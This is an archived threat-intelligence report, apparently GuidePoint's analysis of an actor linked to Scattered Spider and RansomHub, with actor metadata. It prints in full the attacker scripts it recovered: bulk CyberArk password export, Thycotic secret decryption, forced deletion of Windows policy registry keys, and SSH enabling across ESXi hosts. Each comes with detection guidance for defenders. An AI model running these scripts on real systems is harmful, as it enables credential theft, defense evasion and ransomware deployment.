{
	"id": "e817ae92-2c34-4b69-91de-bbf1526e0da8",
	"created_at": "2026-04-06T00:16:49.778534Z",
	"updated_at": "2026-04-10T03:33:15.611462Z",
	"deleted_at": null,
	"sha1_hash": "cebcb1adcd7c1aa5a1eda39c5c91bd76bf15d39d",
	"title": "Worldwide Web: An Analysis of Tactics and Techniques Attributed to Scattered Spider",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 127036,
	"plain_text": "Worldwide Web: An Analysis of Tactics and Techniques Attributed\r\nto Scattered Spider\r\nBy Jason Baker\r\nPublished: 2024-06-12 · Archived: 2026-04-05 23:36:14 UTC\r\nJune 12, 2024\r\nAdditional authors: Rui Ataide and Hermes Bojaxhi\r\nExecutive Summary\r\nIn early 2024, we identified a current affiliate of the RansomHub RaaS group as a former Alphv/Black Cat\r\naffiliate. We assess with high confidence that the same affiliate is a present or former affiliate of the Scattered\r\nSpider threat group, also tracked as UNC3944, Muddled Libra, Octo Tempest, Scatter Swine, and Starfraud. Our\r\nhigh-confidence assessment is based on the following pieces of evidence observed by GuidePoint’s DFIR and\r\nGRIT practices:\r\nOverlapping tools observed in use as part of the threat actors’ intrusions, including ngrok and Tailscale.\r\nOverlapping tactics, including the use of social engineering to orchestrate victim account password resets,\r\nparticularly with American-accented speakers.\r\nOverlapping techniques, including the search for, decryption of, and use of valid credentials, particularly\r\nthrough CyberArk.\r\nOverlapping victims, based on evidence of past claimed victims attributed to Scattered Spider and/or\r\nAlphv.\r\nWe observed the use of scripts containing multiple step-by-step instructions, which may indicate the use of\r\na systematic playbook. Comments appeared throughout a number of PowerShell and Python scripts that\r\nwere executed by the threat actor on victim devices. 
At least some of these appear to have originated from\r\noffensive security scripts available on GitHub, including “SecretServerSecretStealer”.\r\nWe also observed the use of commonplace tools by the threat actor, including:\r\nngrok, a reverse proxy/tunneling tool used for remote access.\r\nRemmina, an open source remote desktop client for POSIX-based operating systems.\r\nTailscale, a software-defined mesh virtual private network(VPN) service.\r\nInvestigation Origin\r\nIn early 2024, GuidePoint’s Digital Forensics and Incident Response (DFIR) team responded to an attempted\r\nransomware event seeking to impact an organization’s ESXi environment, an event we later attributed to an\r\nhttps://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/\r\nPage 1 of 9\n\naffiliate of the RansomHub Ransomware-as-a-Service (RaaS) group. Subsequent threat hunting has led us to\r\nassess with high confidence that the same actor had previously performed successful ransomware attacks under\r\nthe banner of the now-defunct Alphv ransomware group, also known as Black Cat or Noberus. Based on the\r\nobserved threat actor Tactics, Techniques, and Procedures (TTPs), including those presented herein, we can assess\r\nwith high confidence that the actor is either a present or former member of the Scattered Spider affiliate group,\r\nbased on observed overlaps with known Scattered Spider tools, TTPs, and infrastructure. Discussion and\r\nconcurrence from industry peers and law enforcement have supported our assessment to date.\r\nDuring threat hunting and follow-on pivoting by GuidePoint’s Research and Intelligence Team (GRIT), we\r\nuncovered evidence of multiple tools, references to past victim infrastructure, and Python and PowerShell scripts\r\ndating to 2023. 
Much of this evidence appeared to have been inadvertently “left behind” by the threat actor in a\r\nsurprising lapse in Operational Security (OPSEC), that provided us with unique insight into the actor’s TTPs.\r\nSeveral of these tools and scripts are presented in their entirety in this post, though we have redacted details that\r\nmay disclose past or present victim identities or the ultimate source of the reported information. Where feasible,\r\nwe have assessed the most likely purpose of each script, provided associated MITRE ATT\u0026CK technique details,\r\nand reviewed potential detection or mitigation mechanisms that would have identified the activity as it occurred.\r\nWe hope that this report provides additional insight into an aggressive and sophisticated threat actor and threat\r\ngroup that continues to attack and extort organizations worldwide.\r\nNote: Throughout this report, the word “redacted” is used in place of infrastructure details which may\r\ncompromise the sources and methods of our investigation, and do not reflect actual names of infrastructure.\r\nBackground – Scattered Spider\r\nAccording to a Joint Cybersecurity Advisory from the FBI and CISA, Scattered Spider “is a cybercriminal group\r\nthat targets large companies and their contracted information help desks. Scattered Spider threat actors… have\r\ntypically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware\r\nalongside their usual TTPs.” Scattered Spider has attracted particular attention since 2023 for their skill in social\r\nengineering, with calls to help desks to reset account passwords, “SIM-Swapping” attacks, and abuse of identity\r\nand access management platforms serving as hallmarks of their most high-profile attacks. 
This skill has been\r\naugmented by the participation of allegedly Western and native-English-speaking affiliates, overcoming\r\ndifficulties in translation and believability that complicate similar efforts for non-English speakers.\r\nScattered Spider actors were first noted as conducting attacks on behalf of the Alphv/Black Cat RaaS group in late\r\n2023, following alleged attacks on Caesars Entertainment and MGM Resorts. Microsoft has noted that the group\r\nhas “monetized their intrusions since at least 2022 by selling SIM swaps to other criminals and performing\r\naccount takeovers of high-net-worth individuals to steal their cryptocurrency.” When Alphv seemingly disbanded\r\nin early 2024, the question arose as to where Scattered Spider actors would affiliate next. Based on our recent\r\nobservations and incident response investigations, at least some portion may now be conducting operations with\r\nthe newly arrived RansomHub RaaS group.\r\nLimited details have also emerged over the past year linking Scattered Spider actors to an online collective dubbed\r\n“the Com,” which has grown to potentially thousands of members since 2018 and has been associated with a wide\r\nrange of illicit online activities, often by Western young adults. Wired has described other offshoots of “the Com,”\r\nincluding the harassment and extortion group “764,” as having “targeted thousands of people and victimized\r\ndozens, if not hundreds… using some of the internet’s biggest platforms,” often leading to or encouraging self-harm by children and young adults. In January 2024, 19-year-old Noah Michael Urban was arrested in Florida on\r\ncharges of conspiracy to commit wire fraud, eight counts of wire fraud, and five counts of aggravated identity\r\ntheft, ostensibly stemming from operations linked to Scattered Spider. 
Scattered Spider presents as a sophisticated\r\nand persistent threat to large organizations and high-net-worth individuals, and–despite the setback of Alphv’s\r\ndisruption–has shown no indication of declining operational activity. Awareness of Scattered Spider’s TTPs is\r\ncrucial to a threat-informed and intelligence-driven defense, and we are hopeful that the information provided\r\nherein will aid in enterprise detection and response efforts.\r\nObserved Tooling\r\nSecretServerSecretStealer\r\nSecretServerSecretStealer is a PowerShell script that allows for the decryption of passwords (and other items)\r\nstored within a Thycotic Secret Server[1] installation. Two methods are involved: Invoke-SecretDecrypt and\r\nInvoke-SecretStealer.\r\n“Invoke-SecretDecrypt” requires the manual passing of the various data needed to decrypt a single secret.\r\n“Invoke-SecretStealer” is designed to be run on a Thycotic Secret Server machine itself and takes only\r\nthe web root as a parameter. The SecretStealer will decrypt the database configuration and connect to the\r\napplication’s database. All relevant information is extracted, and all secrets are decrypted.\r\nWe identified the use of SecretServerSecretStealer by the threat actor, as evidenced by multiple PowerShell scripts\r\nleveraging the project’s cmdlets. The use of SecretServerSecretStealer has likely been tied to operators of multiple\r\ngroups; “Evil Corp,” also tracked as UNC2165, has been reported to use SecretServerSecretStealer by Mandiant\r\nand the Department of Health and Human Services.\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1212, Exploitation for Credential Access\r\nngrok\r\nAccording to MITRE ATT\u0026CK, ngrok (S0508) is a legitimate reverse proxy tool that can create a secure tunnel\r\nto servers located behind firewalls or on local machines that do not have a public IP. Threat actors have leveraged\r\nngrok in several campaigns, including for lateral movement and data exfiltration. 
We identified the threat actor’s\r\nuse of ngrok as evidenced by forensic artifacts and observable configuration details. Scattered Spider’s use of\r\nngrok has been identified in a Joint FBI-CISA Cybersecurity Advisory on the group.\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1572, Protocol Tunneling; ngrok can tunnel RDP and other services securely over internet connections\r\nT1090, Proxy; ngrok can be used to proxy connections to machines located behind NAT or firewalls\r\nDetection Opportunities:\r\nTo establish its tunnel, ngrok fetches ngrok tunneling server domains and IP addresses from this URL\r\n(https://s3.amazonaws.com/dns.ngrok.com/tunnel.json), which can be used to identify firewall and DNS\r\nlog queries\r\nngrok is typically used to connect over the Remote Desktop Protocol (RDP) on Windows Systems; RDP\r\nconnections can be monitored, alerted on, and reviewed in Microsoft’s event logs.\r\nOpen Source Sigma rules are available to detect the command line parameters of ngrok, such as this one\r\nfrom SigmaHQ.\r\nRemmina\r\nWe identified the use of Remmina, an open-source remote desktop client for POSIX-based operating systems,\r\nbased on command-line instructions for installation via BASH. Remmina would very likely have been used on the\r\nthreat actor’s system to connect remotely to victim infrastructure. We note that the observed installation\r\ninstructions also called for the installation of associated plugins for the RDP and SPICE protocols.\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1021, Remote Services\r\nT1021.001, Remote Services: Remote Desktop Protocol\r\nObserved Scripts\r\nRetrieving CyberArk Account Information With Valid Credentials – PowerShell Script\r\nBoth Mandiant and Reliaquest have reported Scattered Spider’s targeting of CyberArk for credential theft and\r\nlateral movement.  
We observed similar behavior and capabilities demonstrated by the group, in the form of the\r\nbelow PowerShell script that we discovered in the course of our threat hunts. This script interacts with the\r\nCyberArk Privileged Access Security (PAS) solution to pull account information from safes and export it to a\r\nCSV file, almost certainly supporting follow-on lateral movement and persistence in the course of their intrusion.\r\nThe script checks to ensure that the psPAS module is installed (and installs it if not), sets valid CyberArk\r\ncredentials as variables, authenticates with privileged access using those variables, pulls account information from\r\nCyberArk PAS safes, retrieves their passwords, and exports the data to a CSV file.\r\nif (!(Get-Module \"psPAS\")) {\r\n Import-Module \"psPAS\"\r\n}\r\n$baseURL = \"Redacted – Victim URL\"\r\n$outputFile = \"New_Export.csv\"\r\n$firstRun = $true\r\nNew-PASSession -BaseURI $baseURL\r\n$safes = Get-PASSafe\r\nforeach ($safe in $safes) {\r\n Write-Host \"Pulling Accounts from Safe: \" $safe.safeName`... -NoNewLine\r\n $accounts = Get-PASAccount -safeName $safe.safeName\r\n Write-Host \"Done!\" -ForegroundColor Green\r\n foreach ($account in $accounts) {\r\n $date = Get-Date -Format yyyy-MM-dd\r\n Write-Host \"Getting current password for\" $account.name`... 
-NoNewLine\r\n try{\r\n $currentPW = Get-PASAccountPassword -AccountID $account.id -Reason Work\r\n }\r\n catch{\r\n $currentPW = Get-PASAccountPassword -AccountID $account.id -Reason Work -TicketID \"null\"\r\n }\r\n Write-Host \"Done!\" -ForegroundColor Green\r\n $outputCSV = New-Object -TypeName PSobject -Property @{\r\n DatePulled = $date\r\n Safe = $account.safeName\r\n ObjectID = $account.name\r\n UserName = $account.userName\r\n Password = $currentPW.Password\r\n }\r\n if ($firstRun -ne $false) {\r\n $outputCSV | Select-Object -Property DatePulled,Safe,ObjectID,UserName,Password | ConvertTo-Csv -NoTy\r\n Add-Content $outputFile\r\n } else {\r\n $outputCSV | Select-Object -Property DatePulled,Safe,ObjectID,UserName,Password | ConvertTo-Csv -NoTy\r\n Select-Object -Skip 1 | Add-Content $outputFile\r\n }\r\n $firstRun = $false\r\n }\r\n}\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1059.01, Command and Scripting Interpreter: PowerShell\r\nT1087, Account Discovery\r\nT1212, Exploitation for Credential Access\r\nT1552, Unsecured Credentials\r\nT1555, Credentials from Password Stores\r\nDetection Opportunities\r\nFor organizations with PowerShell module logging, script block logging, and transcription enabled, this\r\nscript may be detectable via Sigma rules based on the details of this script. Details may also be discovered\r\nusing retroactive threat hunts.\r\nE.g., CommandLine:'*Get-PASAccountPassword* -AccountID*'\r\nThycotic Secrets Dump Decryption – PowerShell Script\r\nWhile we have not observed reporting explicitly indicating Scattered Spider’s targeting of Thycotic, we assess\r\nwith high confidence that the group’s actors would have similar interest in targeting the platform for the same\r\npurposes as CyberArk. 
We discovered the below PowerShell script in the course of our threat hunts, which uses\r\nPowerShell cmdlets to route the results of a Thycotic Secrets Dump to a CSV file, load the CSV file, then iterate\r\nthrough the CSV file to decrypt each secret using the Invoke-SecretDecrypt method of the\r\nSecretServerSecretStealer project. The decrypted secrets are then appended to an outputted CSV file. This script\r\nmay be intended as a follow-on action to the thycotic_secretserver_dump module of Metasploit.\r\n$csvPath = \"C:\\Redacted\\thycotic dump\\out.csv\"\r\n$masterkey = \"Redacted\"\r\n$outputPath = \"C:\\Redacted\\thycotic dump\\final.csv\"\r\n$secrets = Import-Csv $csvPath\r\nforeach ($secret in $secrets) {\r\n $decryptedValue = Invoke-SecretDecrypt -EncryptionConfig .\\encryption.config -NewFormat -Key $secret.Key.Sub\r\n $outputObject = [PsCustomObject]@{\r\n SecretName = $secret.SecretName\r\n SecretFieldName = $secret.SecretFieldName\r\n DecryptedValue = $decryptedValue\r\n }\r\n $outputObject | Export-Csv -Path $outputPath -Append -NoTypeInformation\r\n}\r\nWrite-Output \"Decryption complete. Output saved to $outputPath\"\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1212, Exploitation for Credential Access\r\nT1552, Unsecured Credentials\r\nT1555, Credentials from Password Stores\r\nDetection Opportunities:\r\nFor organizations with PowerShell module logging, script block logging, and transcription enabled, this\r\nscript may be detectable via Sigma rules based on the details of this script. Details may also be discovered\r\nusing retroactive threat hunts.\r\nE.g., CommandLine: '*Invoke-SecretDecrypt*'\r\nWindows Registry Subkey Deletion – Batch Script\r\nWe discovered the below batch script in the course of our threat hunting efforts. 
The batch script, which deletes\r\nmultiple registry subkeys and entries, is almost certainly intended to circumvent Virus and Threat protection\r\nsettings in Windows, presumably in support of defense evasion efforts. The reg delete command deletes the\r\nexisting registry subkey or entry without asking for confirmation by using the /f parameter. Of note, the\r\ncommands issued as part of this script have been repeatedly recommended in Microsoft Community forums by\r\nmoderators as a remedial step to overcome organizational settings and controls.\r\nreg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\" /f\r\nreg delete \"HKCU\\Software\\Microsoft\\WindowsSelfHost\" /f\r\nreg delete \"HKCU\\Software\\Policies\" /f\r\nreg delete \"HKLM\\Software\\Microsoft\\Policies\" /f\r\nreg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\" /f\r\nreg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\WindowsStore\\WindowsUpdate\" /f\r\nreg delete \"HKLM\\Software\\Microsoft\\WindowsSelfHost\" /f\r\nreg delete \"HKLM\\Software\\Policies\" /f\r\nreg delete \"HKLM\\Software\\WOW6432Node\\Microsoft\\Policies\" /f\r\nreg delete \"HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\" /f\r\nreg delete \"HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\WindowsStore\\WindowsUpdate\" /f\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1059, Command and Scripting Interpreter\r\nT1112, Modify Registry\r\nDetection Opportunities:\r\nSigma rules can be built based on the CommandLine details of this script\r\nE.g., CommandLine: '*reg delete \"HKCU\\\\Software\\\\Microsoft\\\\WindowsSelfHost\" /f*'\r\nSigma rules can be built based on the TargetObject of the above referenced Registry Subkeys\r\nESXi Discovery and SSH Enabling – PowerShell Script\r\nWe discovered the below PowerShell script in the course of our threat hunting efforts and have noted that it likely\r\nserves to facilitate discovery and increase 
the susceptibility of an organization’s ESXi environment to subsequent\r\nencryptor deployment. This script connects to a vCenter Server, retrieves all ESXi hosts, and configures the SSH\r\nservice on each host to start automatically, allowing external SSH connections. In other instances, we also\r\nobserved the use of a similar script to reset the ESXi root user password and then disconnect from the vCenter\r\nServer.\r\nConnect-VIServer -Server [Redacted] -User root -Password [Redacted]\r\n$esxiHosts = Get-VMHost\r\nforeach ($esxiHost in $esxiHosts) {\r\n $sshService = Get-VMHostService -VMHost $esxiHost | Where { $_.Key -eq \"TSM-SSH\"}\r\n $sshService.Policy.StartPolicy = \"start\"\r\n Set-VMHostService -VMHost $esxiHost -Service $sshService\r\n}\r\nDisconnect-VIServer -Server [Redacted] -Confirm:$false\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT0846, Remote System Discovery\r\nT1021.004, Remote Services: SSH\r\nT1059.01, Command and Scripting Interpreter: PowerShell\r\nDetection Opportunities:\r\nFor organizations with PowerShell module logging, script block logging, and transcription enabled, this\r\nscript may be detectable via Sigma rules based on the details of this script. 
Details may also be discovered\r\nusing retroactive threat hunts.\r\nE.g., CommandLine:'*Disconnect-VIServer* -Server * -Confirm:$false*'\r\nEncryptor Delivery to ESXi Hosts via SSH – Python Script\r\nFinally, among the scripts discovered as “left behind” by the threat actor was a seemingly customized Python\r\nScript designed to establish an SSH connection with prospective victim ESXi servers, transfer the encryptor via\r\nSFTP, verify the successful transfer of the encryptor, and execute the encryptor across multiple servers in parallel.\r\nMITRE, Avertium, and Aon have all described the use of SSH and the encryption of ESXi environments as\r\ncharacteristic of Scattered Spider operations, though we note that these details are shared by multiple ransomware\r\nand extortion groups. This script would likely be used following the ESXi discovery and SSH enabling script\r\nabove in order to maximize its impact. The script uses previously acquired ESXi IP addresses and credentials to\r\nperform the actions recursively across an environment.\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1021.004, Remote Services: SSH\r\nT1059.006, Command and Scripting Interpreter: Python\r\nT1105, Ingress Tool Transfer\r\nT1486, Data Encrypted for Impact\r\nDetection Opportunities:\r\nInstallation of Python on an unexpected server.\r\nSSH connections from a Windows server in a short period of time to multiple ESXi hosts.\r\nEDR telemetry on network connections from a Python executable to ESXi infrastructure from unexpected\r\nlocations\r\nConclusion\r\nOver the course of this report, we have highlighted tools and scripts employed by a suspected Scattered Spider\r\nactor in the course of double-extortion ransomware operations, which they appear to have continued from Alphv-aligned operations into RansomHub-aligned operations. 
The actor takes advantage of open source tooling,\r\nincluding ngrok, Remmina, and Tailscale, commonly used by ransomware actors for remote access and command\r\nand control, and also employs a series of PowerShell and Python scripts to perform credential theft, lateral\r\nmovement, privilege escalation, command and control, and actions on objectives.\r\nIn addition to the TTPs described in this report, we note that social engineering, particularly as it pertains to\r\nlegitimate account takeovers, remains emblematic of Scattered Spider operations. Each of our incident response\r\ninvestigations that have involved a known or suspected Scattered Spider actor has included some element of social\r\nengineering, with the most common being the deception of help desk personnel for the purpose of account\r\npassword resets or multifactor authentication setup. User education and processes designed to verify the identity\r\nof callers are the two most effective means of combatting this tactic, which will almost always pass undetected\r\nunless reported by employees.\r\nFinally, we wish to highlight the “good news” – This threat actor’s use of open-source tools and likely\r\npreformulated scripts are not indicative of a highly innovative and novel threat, but instead align with threats\r\ncommonly posed by most prolific ransomware groups – albeit with a greater emphasis on identity and access\r\nmanagement. The threat actor’s primary advantage over other groups thus lies mainly in their ability to\r\npersistently and convincingly conduct social engineering operations, and to remain persistent in their attempts to\r\ngain unauthorized access until detected and evicted. 
In at least one case with which we are familiar, Scattered\r\nSpider actors did not attempt reentry once successfully evicted from a target environment, suggesting that the\r\ngroup’s operations may be opportunistic in nature rather than highly focused on successfully compromising\r\nspecific targets.\r\nSharing of threat intelligence information ranging from the atomic to the behavioral remains one of our greatest\r\npotential advantages as Defenders. Properly analyzed and disseminated, there is little reason for today’s adversary\r\nTTPs to work a year from now. We encourage our industry peers and partners to proactively share similar\r\ninformation with the wider community in the interest of raising our collective defenses and increasing the barriers\r\nour adversaries must surmount to achieve their objectives.\r\n[1]Thycotic Secret Server is a Privileged Access Management (PAM) solution that offers a centralized vault to\r\nstore sensitive information such as passwords, keys, and certificates for access by authorized personnel.\r\nSource: https://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/"
	],
	"report_names": [
		"worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider"
	],
	"threat_actors": [
		{
			"id": "1b1271d2-e9a2-4fc5-820b-69c9e4cfb312",
			"created_at": "2024-06-07T02:00:03.998431Z",
			"updated_at": "2026-04-10T02:00:03.64336Z",
			"deleted_at": null,
			"main_name": "RansomHub",
			"aliases": [],
			"source_name": "MISPGALAXY:RansomHub",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9ddc7baf-2ea7-4294-af2c-5fce1021e8e8",
			"created_at": "2023-06-23T02:04:34.386651Z",
			"updated_at": "2026-04-10T02:00:04.772256Z",
			"deleted_at": null,
			"main_name": "Muddled Libra",
			"aliases": [
				"0ktapus",
				"Scatter Swine",
				"Scattered Spider"
			],
			"source_name": "ETDA:Muddled Libra",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7da6012f-680b-48fb-80c4-1b8cf82efb9c",
			"created_at": "2023-11-01T02:01:06.643737Z",
			"updated_at": "2026-04-10T02:00:05.340198Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"Scattered Spider",
				"Roasted 0ktapus",
				"Octo Tempest",
				"Storm-0875",
				"UNC3944"
			],
			"source_name": "MITRE:Scattered Spider",
			"tools": [
				"WarzoneRAT",
				"Rclone",
				"LaZagne",
				"Mimikatz",
				"Raccoon Stealer",
				"ngrok",
				"BlackCat",
				"ConnectWise"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "50068c14-343c-4491-b568-df41dd59551c",
			"created_at": "2022-10-25T15:50:23.253218Z",
			"updated_at": "2026-04-10T02:00:05.234464Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Indrik Spider",
				"Evil Corp",
				"Manatee Tempest",
				"DEV-0243",
				"UNC2165"
			],
			"source_name": "MITRE:Indrik Spider",
			"tools": [
				"Mimikatz",
				"PsExec",
				"Dridex",
				"WastedLocker",
				"BitPaymer",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c3b908de-3dd1-4e5d-ba24-5af8217371f0",
			"created_at": "2023-10-03T02:00:08.510742Z",
			"updated_at": "2026-04-10T02:00:03.374705Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"UNC3944",
				"Scattered Swine",
				"Octo Tempest",
				"DEV-0971",
				"Starfraud",
				"Muddled Libra",
				"Oktapus",
				"Scatter Swine",
				"0ktapus",
				"Storm-0971"
			],
			"source_name": "MISPGALAXY:Scattered Spider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b296f34c-c424-41da-98bf-90312a5df8ef",
			"created_at": "2024-06-19T02:03:08.027585Z",
			"updated_at": "2026-04-10T02:00:03.621193Z",
			"deleted_at": null,
			"main_name": "GOLD DRAKE",
			"aliases": [
				"Evil Corp",
				"Indrik Spider ",
				"Manatee Tempest "
			],
			"source_name": "Secureworks:GOLD DRAKE",
			"tools": [
				"BitPaymer",
				"Cobalt Strike",
				"Covenant",
				"Donut",
				"Dridex",
				"Hades",
				"Koadic",
				"LockBit",
				"Macaw Locker",
				"Mimikatz",
				"Payload.Bin",
				"Phoenix CryptoLocker",
				"PowerShell Empire",
				"PowerSploit",
				"SocGholish",
				"WastedLocker"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "86ab9be8-ce67-4866-9f66-1df471e9d251",
			"created_at": "2024-05-29T02:00:03.942487Z",
			"updated_at": "2026-04-10T02:00:03.641939Z",
			"deleted_at": null,
			"main_name": "Alpha Spider",
			"aliases": [
				"ALPHV Ransomware Group"
			],
			"source_name": "MISPGALAXY:Alpha Spider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d093e8d9-b093-47b8-a988-2a5cbf3ccec9",
			"created_at": "2023-10-14T02:03:13.99057Z",
			"updated_at": "2026-04-10T02:00:04.531987Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"0ktapus",
				"LUCR-3",
				"Muddled Libra",
				"Octo Tempest",
				"Scatter Swine",
				"Scattered Spider",
				"Star Fraud",
				"Storm-0875",
				"UNC3944"
			],
			"source_name": "ETDA:Scattered Spider",
			"tools": [
				"ADRecon",
				"AnyDesk",
				"ConnectWise",
				"DCSync",
				"FiveTran",
				"FleetDeck",
				"Govmomi",
				"Hekatomb",
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"Lumma Stealer",
				"LummaC2",
				"Mimikatz",
				"Ngrok",
				"PingCastle",
				"ProcDump",
				"PsExec",
				"Pulseway",
				"Pure Storage FlashArray",
				"Pure Storage FlashArray PowerShell SDK",
				"RedLine Stealer",
				"Rsocx",
				"RustDesk",
				"ScreenConnect",
				"SharpHound",
				"Socat",
				"Spidey Bot",
				"Splashtop",
				"Stealc",
				"TacticalRMM",
				"Tailscale",
				"TightVNC",
				"VIDAR",
				"Vidar Stealer",
				"WinRAR",
				"WsTunnel",
				"gosecretsdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9806f226-935f-48eb-b138-6616c9bb9d69",
			"created_at": "2022-10-25T16:07:23.73153Z",
			"updated_at": "2026-04-10T02:00:04.729977Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Blue Lelantos",
				"DEV-0243",
				"Evil Corp",
				"G0119",
				"Gold Drake",
				"Gold Winter",
				"Manatee Tempest",
				"Mustard Tempest",
				"UNC2165"
			],
			"source_name": "ETDA:Indrik Spider",
			"tools": [
				"Advanced Port Scanner",
				"Agentemis",
				"Babuk",
				"Babuk Locker",
				"Babyk",
				"BitPaymer",
				"Bugat",
				"Bugat v5",
				"Cobalt Strike",
				"CobaltStrike",
				"Cridex",
				"Dridex",
				"EmPyre",
				"EmpireProject",
				"FAKEUPDATES",
				"FakeUpdate",
				"Feodo",
				"FriedEx",
				"Hades",
				"IEncrypt",
				"LINK_MSIEXEC",
				"MEGAsync",
				"Macaw Locker",
				"Metasploit",
				"Mimikatz",
				"PayloadBIN",
				"Phoenix Locker",
				"PowerShell Empire",
				"PowerSploit",
				"PsExec",
				"QNAP-Worm",
				"Raspberry Robin",
				"RaspberryRobin",
				"SocGholish",
				"Vasa Locker",
				"WastedLoader",
				"WastedLocker",
				"cobeacon",
				"wp_encrypt"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e424a2db-0f5a-4ee5-96d2-5ab16f1f3824",
			"created_at": "2024-06-19T02:03:08.062614Z",
			"updated_at": "2026-04-10T02:00:03.655475Z",
			"deleted_at": null,
			"main_name": "GOLD HARVEST",
			"aliases": [
				"Octo Tempest ",
				"Roasted 0ktapus ",
				"Scatter Swine ",
				"Scattered Spider ",
				"UNC3944 "
			],
			"source_name": "Secureworks:GOLD HARVEST",
			"tools": [
				"AnyDesk",
				"ConnectWise Control",
				"Logmein"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6c4f98b3-fe14-42d6-beaa-866395455e52",
			"created_at": "2023-01-06T13:46:39.169554Z",
			"updated_at": "2026-04-10T02:00:03.23458Z",
			"deleted_at": null,
			"main_name": "Evil Corp",
			"aliases": [
				"GOLD DRAKE"
			],
			"source_name": "MISPGALAXY:Evil Corp",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434609,
	"ts_updated_at": 1775791995,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cebcb1adcd7c1aa5a1eda39c5c91bd76bf15d39d.pdf",
		"text": "https://archive.orkl.eu/cebcb1adcd7c1aa5a1eda39c5c91bd76bf15d39d.txt",
		"img": "https://archive.orkl.eu/cebcb1adcd7c1aa5a1eda39c5c91bd76bf15d39d.jpg"
	}
}